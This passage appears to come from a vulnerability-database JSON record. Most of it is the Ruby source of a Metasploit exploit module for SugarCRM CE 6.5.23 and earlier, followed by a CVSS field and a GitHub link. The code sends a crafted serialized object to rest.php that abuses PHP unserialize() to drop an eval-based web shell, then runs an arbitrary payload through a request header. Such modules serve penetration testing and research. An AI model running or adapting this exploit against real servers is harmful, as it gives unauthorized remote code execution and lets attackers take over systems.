'EgiX',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://karmainsecurity.com/KIS-2016-07'],\n ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],\n ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],\n ['URL', 'https://bugs.php.net/bug.php?id=72663']\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 23 2016'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/sugarcrm/\"])\n ])\n end\n\n def exploit\n upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'\n\n payload_serialized = \"O:+14:\\\"SugarCacheFile\\\":23:{S:17:\\\"\\\\00*\\\\00_cacheFileName\\\";\"\n payload_serialized << \"s:#{upload_php.length+2}:\\\"..#{upload_php}\\\";S:16:\\\"\\\\00*\\\\00\"\n payload_serialized << \"_cacheChanged\\\";b:1;S:14:\\\"\\\\00*\\\\00_localStore\\\";a:1:{i:0;s:55\"\n payload_serialized << \":\\\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\\\";}}\"\n\n print_status(\"#{peer} - Exploiting the unserialize() to upload PHP code\")\n\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),\n 'method' => 'POST',\n 'vars_post' => {\n 'method' => 'login',\n 'input_type' => 'Serialize',\n 'rest_data' => payload_serialized\n }\n })\n\n unless res\n print_error('Connection timed out while sending a request to rest.php')\n return\n end\n\n if res && res.code != 200\n print_error(\"#{peer} - Exploit failed: #{res.code}\")\n return\n end\n\n register_files_for_cleanup(File.basename(upload_php))\n\n print_status(\"#{peer} - Executing the payload #{upload_php}\")\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, upload_php),\n 'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }\n })\n\n if res && res.code != 200\n print_error(\"#{peer} - Payload execution failed: #{res.code}\")\n return\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb"}]}